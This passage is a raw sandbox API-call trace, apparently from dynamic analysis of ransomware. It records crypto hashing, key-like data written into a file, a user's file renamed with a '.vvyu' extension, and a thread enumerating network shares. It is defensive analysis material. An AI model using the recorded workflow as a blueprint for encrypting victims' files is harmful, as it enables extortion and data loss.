pdwDataLen=0x312fa54) returned 1 [0204.241] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0204.241] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0204.241] GetLastError () returned 0x0 [0204.241] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0204.241] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0204.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0204.242] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0204.242] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0204.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0204.242] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0204.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0204.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0204.242] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c0) returned 0x2e902a0 [0204.242] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea20f8 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3800 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea2140 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3818 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3848 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea38a8 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3860 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0204.243] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0204.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0204.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0204.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3860 | out: hHeap=0x620000) returned 1 [0204.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea38a8 | out: hHeap=0x620000) returned 1 [0204.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0204.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0204.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea38a8 [0204.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0204.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3860 [0204.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0204.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3848 [0204.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0204.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c998c8 [0204.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0204.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0204.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0204.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99c10 [0204.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0204.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0204.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0204.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3860 | out: hHeap=0x620000) returned 1 [0204.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0204.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0204.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0204.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0204.245] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea38a8 | out: hHeap=0x620000) returned 1 [0204.246] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0204.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0204.249] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0204.249] GetCurrentThreadId () returned 0x66c [0204.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0204.249] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea4020 [0204.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0204.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0204.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0204.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0204.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0204.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0204.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0204.250] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0204.250] GetCurrentThreadId () returned 0x66c [0204.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0204.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0204.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0204.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0204.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0204.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0204.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0204.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0204.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea38a8 [0204.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0204.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0204.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0204.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3848 [0204.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0204.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0204.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0204.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0204.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0204.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0204.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0204.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3860 [0204.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0204.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0204.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0204.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3830 [0204.253] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0204.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea38c0 [0204.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0204.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0204.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0204.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3890 [0204.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0204.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3878 [0204.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0204.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea38d8 [0204.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3878 | out: hHeap=0x620000) returned 1 [0204.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3878 [0204.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3890 | out: hHeap=0x620000) returned 1 [0204.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0204.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0204.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0204.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0204.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0204.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0204.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3848 [0204.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0204.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2e91368 [0204.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea38a8 | out: hHeap=0x620000) returned 1 [0204.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0204.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea38d8 | out: hHeap=0x620000) returned 1 [0204.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2d08630 [0204.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0204.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0204.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0204.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0204.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3848 | out: hHeap=0x620000) returned 1 [0204.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6a68 [0204.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0204.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0204.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0204.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0204.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0204.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0204.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0204.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0204.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0204.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0204.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0204.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0204.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3878 | out: hHeap=0x620000) returned 1 [0204.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0204.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea38c0 | out: hHeap=0x620000) returned 1 [0204.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0204.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3860 | out: hHeap=0x620000) returned 1 [0204.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3830 | out: hHeap=0x620000) returned 1 [0204.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0204.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0204.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0204.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3818 | out: hHeap=0x620000) returned 1 [0204.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2140 | out: hHeap=0x620000) returned 1 [0204.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91368 | out: hHeap=0x620000) returned 1 [0204.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0204.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0204.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0204.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0204.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0204.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0204.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0204.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0204.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0204.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0204.262] WriteFile (in: hFile=0x510, lpBuffer=0x2e902a0*, nNumberOfBytesToWrite=0x10b9, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e902a0*, lpNumberOfBytesWritten=0x312fb14*=0x10b9, lpOverlapped=0x0) returned 1 [0204.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a0 | out: hHeap=0x620000) returned 1 [0204.263] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x10be, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.263] WriteFile (in: hFile=0x510, lpBuffer=0x2e95fa8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95fa8*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0204.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0204.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4930 [0204.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0204.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0204.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0204.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0204.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4930 | out: hHeap=0x620000) returned 1 [0204.265] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0204.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0204.266] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.266] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0204.266] CloseHandle (hObject=0x510) returned 1 [0204.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0204.267] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x900) returned 0x2ea6a68 [0204.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0204.268] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico.vvyu" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\microsoft\\internet explorer\\services\\search_{0633ee93-d776-472f-a0ff-e1416b8b2e3a}.ico.vvyu")) returned 1 [0204.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0204.274] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0204.274] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0204.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0204.278] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7525ca20, ftCreationTime.dwHighDateTime=0x1d7b064, ftLastAccessTime.dwLowDateTime=0x7525ca20, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x7525ca20, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x10be, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico", cAlternateFileName="SEARCH~1.ICO")) returned 0 [0204.278] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0204.278] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0204.279] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2f930 | out: hHeap=0x620000) returned 1 [0204.280] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0204.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e918d8 | out: hHeap=0x620000) returned 1 [0204.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6dd158 | out: hHeap=0x620000) returned 1 [0204.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c36d40 | out: hHeap=0x620000) returned 1 [0204.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0204.280] SendMessageW (hWnd=0x20100, Msg=0x8003, wParam=0x0, lParam=0x0) returned 0x0 [0204.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e76e58 | out: hHeap=0x620000) returned 1 [0204.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95a0 | out: hHeap=0x620000) returned 1 [0204.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6756a8 | out: hHeap=0x620000) returned 1 Thread: id = 182 os_tid = 0x378 [0182.309] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x322fee0 | out: lphEnum=0x322fee0*=0x2cfe0c0) returned 0x0 [0182.369] WNetEnumResourceW (in: hEnum=0x2cfe0c0, lpcCount=0x322fedc, lpBuffer=0x2e84288, lpBufferSize=0x322fed8 | out: lpcCount=0x322fedc, lpBuffer=0x2e84288, lpBufferSize=0x322fed8) returned 0x0 [0182.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddab0 [0182.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddaf8 [0182.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0182.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddb40 [0182.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddb88 [0182.369] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x0, lpNetResource=0x2e84288, lphEnum=0x322fe28 | out: lphEnum=0x322fe28*=0x646288) returned 0x0 [0182.376] WNetEnumResourceW (in: hEnum=0x646288, lpcCount=0x322fe24, lpBuffer=0x2e88290, lpBufferSize=0x322fe20 | out: lpcCount=0x322fe24, lpBuffer=0x2e88290, lpBufferSize=0x322fe20) returned 0x103 [0182.376] WNetCloseEnum (hEnum=0x646288) returned 0x0 [0182.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddaf8 | out: hHeap=0x620000) returned 1 [0182.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddab0 | out: hHeap=0x620000) returned 1 [0182.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddab0 [0182.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddaf8 [0182.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe0) returned 0x656f80 [0182.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddbd0 [0182.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddc18 [0182.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddb88 | out: hHeap=0x620000) returned 1 [0182.378] HeapFree 